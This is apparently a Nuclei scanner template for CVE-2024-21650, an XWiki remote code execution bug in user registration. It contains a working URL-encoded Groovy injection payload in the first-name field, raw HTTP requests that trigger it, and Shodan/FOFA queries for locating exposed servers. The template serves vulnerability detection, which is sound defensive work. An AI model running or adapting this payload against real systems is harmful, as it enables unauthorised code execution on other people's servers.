id: CVE-2024-21650 info: name: XWiki < 4.10.20 - Remote code execution author: ritikchaddha severity: critical description: | XWiki is vulnerable to a remote code execution (RCE) attack through its user registration feature. This issue allows an attacker to execute arbitrary code by crafting malicious payloads in the "first name" or "last name" fields during user registration. This impacts all installations that have user registration enabled for guests. impact: | Successful exploitation could lead to remote code execution. remediation: | This vulnerability has been patched in XWiki 14.10.17, 15.5.3 and 15.8 RC1. reference: - https://jira.xwiki.org/browse/XWIKI-21173 - https://nvd.nist.gov/vuln/detail/CVE-2024-21650 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cve-id: CVE-2024-21650 cwe-id: CWE-95 epss-score: 0.0015 epss-percentile: 0.50461 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: max-request: 4 verified: true vendor: xwiki product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" tags: cve,cve2024,xwiki,rce variables: user: "{{rand_base(6)}}" pass: "{{rand_base(8)}}" email: "{{randstr}}%40{{rand_base(5)}}.com" firstname: "%5D%5D%7B%7B%2Fhtml%7D%7D%7B%7Basync%7D%7D%7B%7Bgroovy%7D%7Dservices.logging.getLogger%28%22attacker%22%29.error%28%22Attack+succeeded%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D" lastname: "{{rand_base(5)}}" http: - raw: - | GET {{path}}/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fbin%252Fregister%252FXWiki%252FXWikiRegister%253Fxredirect%253D%25252Fxwiki%25252Fbin%25252Fview%25252FScheduler%25252F%25253Fdo%25253Dtrigger%252526which%25253DScheduler.NotificationEmailDailySender HTTP/1.1 Host: {{Hostname}} - | POST {{path}}/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded parent=xwiki%3AMain.UserDirectory®ister_first_name={{firstname}}®ister_last_name={{lastname}}&xwikiname={{user}}®ister_password={{pass}}®ister2_password={{pass}}®ister_email="{{randstr}}%40{{rand_base(5)}}.com&xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender&form_token={{token}} payloads: path: - - /xwiki stop-at-first-match: true host-redirects: true max-redirects: 2 skip-variables-check: true matchers-condition: and matchers: - type: word part: body_2 words: - "Registration successful" - "Attack succeeded" - "Failed to execute the [groovy]" condition: and - type: status status: - 200 extractors: - type: regex part: body name: token group: 1 regex: - data\-xwiki\-form\-token="([a-zA-Z0-9]+)"> internal: true